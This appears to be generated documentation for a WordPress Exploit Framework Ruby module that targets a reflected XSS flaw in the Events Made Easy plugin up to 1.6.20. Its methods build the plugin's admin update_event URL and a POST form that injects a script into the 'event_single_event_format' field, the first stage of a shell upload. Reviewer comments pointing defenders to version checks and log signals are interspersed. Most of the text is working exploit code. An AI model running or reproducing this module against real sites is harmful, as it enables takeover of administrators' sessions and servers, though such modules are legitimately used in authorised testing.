class Wpxf::Exploit::EventsMadeEasyReflectedXssShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::StagedReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 6
#
# Sets up the module: runs the superclass initializer, records the module
# metadata (name, authors, references, date) and registers the single
# required integer option, `event_id`.
#
# NOTE(review): the name states "<= 1.6.20" as the affected range; sites
# running the plugin should confirm they are on a later release.
def initialize
  super

  # Metadata shown for this module; credits and references are kept
  # exactly as published.
  module_info = {
    name: 'Events MAde Easy <= 1.6.20 Reflected XSS Shell Upload',
    author: [
      'Job Diesveld', # Discovery
      'rastating'     # WPXF module
    ],
    references: [
      ['WPVDB', '8595'],
      ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_events_made_easy_wordpress_plugin.html']
    ],
    date: 'Aug 04 2016'
  }
  update_info(**module_info)

  # The event ID is mandatory because it is interpolated into the URL
  # built by #vulnerable_url.
  event_id_option = IntegerOption.new(
    name: 'event_id',
    desc: 'A valid event ID (can be found in the URL of an event page)',
    required: true
  )
  register_option(event_id_option)
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 31
#
# Version check for the `events-made-easy` plugin, delegated to
# check_plugin_version_from_readme with '1.6.21' as the version boundary.
#
# NOTE(review): with the module name stating "<= 1.6.20", 1.6.21 is
# presumably the first fixed release — confirm against the advisory. For
# site owners this is the version to be at or above.
def check
  plugin_slug = 'events-made-easy'
  version_boundary = '1.6.21'
  check_plugin_version_from_readme(plugin_slug, version_boundary)
end
event_id()
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 35
#
# Returns the value of the `event_id` option as produced by
# normalized_option_value. The option is registered as a required
# IntegerOption in #initialize.
def event_id
  option_name = 'event_id'
  normalized_option_value(option_name)
end
form_fields()
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 47
#
# Builds the hash of form fields that #initial_script passes, together with
# #vulnerable_url, to create_basic_post_script.
#
# Almost every value is fixed or random filler. The only field that carries
# markup is 'event_single_event_format', which wraps the value of
# xss_ascii_encoded_include_script in a script element.
#
# NOTE(review): presumably 'event_single_event_format' is the parameter that
# affected plugin versions return without output encoding — confirm against
# the referenced advisory. For defenders: script markup in the format fields
# of a request to the plugin's update_event admin action is a reasonable
# signal to alert on, and #check treats 1.6.21 as the version boundary.
def form_fields
  {
    # One of three status values chosen at random; their meaning is not
    # shown in this file.
    'event_status' => [1, 2, 5].sample,
    'event_contactperson_id' => -1,
    'event_seats' => 0,
    'price' => 0,
    'currency' => 'EUR',
    'eme_prop_max_allowed' => Utility::Text.rand_numeric(2),
    'eme_prop_min_allowed' => Utility::Text.rand_numeric(1),
    'eme_prop_rsvp_discount' => '',
    'eme_prop_rsvp_discountgroup' => '',
    'rsvp_number_days' => Utility::Text.rand_numeric(1),
    'rsvp_number_hours' => Utility::Text.rand_numeric(1),
    'eme_prop_rsvp_end_target' => 'start',
    'event_name' => Utility::Text.rand_alphanumeric(10),
    'event_slug' => Utility::Text.rand_alphanumeric(10),
    # Every date and time field is filled from Time.now, each in two
    # formats (localised d/m/Y and ISO-style Y-m-d).
    'localised_recurrence_date' => Time.now.strftime('%d/%m/%Y'),
    'recurrence_start_date' => Time.now.strftime('%Y-%m-%d'),
    'localised_recurrence_end_date' => Time.now.strftime('%d/%m/%Y'),
    'recurrence_end_date' => Time.now.strftime('%Y-%m-%d'),
    'recurrence_freq' => ['daily', 'weekly', 'monthly'].sample,
    'recurrence_interval' => '',
    'recurrence_byweekno' => 1,
    'recurrence_byday' => 1,
    'localised_event_start_date' => Time.now.strftime('%d/%m/%Y'),
    'event_start_date' => Time.now.strftime('%Y-%m-%d'),
    'localised_event_end_date' => Time.now.strftime('%d/%m/%Y'),
    'event_end_date' => Time.now.strftime('%Y-%m-%d'),
    'event_start_time' => Time.now.strftime('%I:%M%p'),
    'event_end_time' => Time.now.strftime('%I:%M%p'),
    'eme_prop_event_page_title_format_tpl' => 0,
    'event_page_title_format' => Utility::Text.rand_alphanumeric(10),
    'eme_prop_event_single_event_format_tpl' => 0,
    # The one field that carries script markup (see the method header).
    'event_single_event_format' => "<script>#{xss_ascii_encoded_include_script}<\\/script>",
    'eme_prop_event_contactperson_email_body_tpl' => 0,
    'event_contactperson_email_body' => '',
    'eme_prop_event_registration_recorded_ok_html_tpl' => 0,
    'event_registration_recorded_ok_html' => '',
    'eme_prop_event_respondent_email_body_tpl' => 0,
    'event_respondent_email_body' => '',
    'eme_prop_event_registration_pending_email_body_tpl' => 0,
    'event_registration_pending_email_body' => '',
    'eme_prop_event_registration_updated_email_body_tpl' => 0,
    'event_registration_updated_email_body' => '',
    'eme_prop_event_registration_cancelled_email_body_tpl' => 0,
    'event_registration_cancelled_email_body' => Utility::Text.rand_alphanumeric(10),
    'eme_prop_event_registration_denied_email_body_tpl' => 0,
    'event_registration_denied_email_body' => Utility::Text.rand_alphanumeric(10),
    'eme_prop_event_registration_form_format_tpl' => 0,
    'event_registration_form_format' => '',
    'eme_prop_event_cancel_form_format_tpl' => 0,
    'event_cancel_form_format' => '',
    'location_name' => Utility::Text.rand_alphanumeric(5),
    'location_address' => Utility::Text.rand_alphanumeric(5),
    'location_town' => Utility::Text.rand_alphanumeric(5),
    'location_latitude' => '',
    'location_longitude' => '',
    'content' => Utility::Text.rand_alphanumeric(10),
    'event_image_url' => '',
    'event_image_id' => '',
    'event_url' => '',
    'event_update_button' => ''
  }
end
initial_script()
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 43
#
# Returns the result of create_basic_post_script for the URL from
# #vulnerable_url and the field hash from #form_fields.
def initial_script
  target_url = vulnerable_url
  post_fields = form_fields
  create_basic_post_script(target_url, post_fields)
end
vulnerable_url()
# File lib/wpxf/modules/exploit/xss/reflected/events_made_easy_reflected_xss_shell_upload.rb, line 39
#
# Builds the URL of the plugin's `update_event` admin action for the
# configured event ID by joining it onto wordpress_url_admin.
#
# NOTE(review): the endpoint sits under the WordPress admin area, so the
# request presumably only takes effect in an authenticated administrator's
# session — confirm against the advisory. This path and query string are
# what to look for in access logs when reviewing exposure.
def vulnerable_url
  admin_base = wordpress_url_admin
  action_path = "admin.php?page=events-manager&eme_admin_action=update_event&event_id=#{event_id}"
  normalize_uri(admin_base, action_path)
end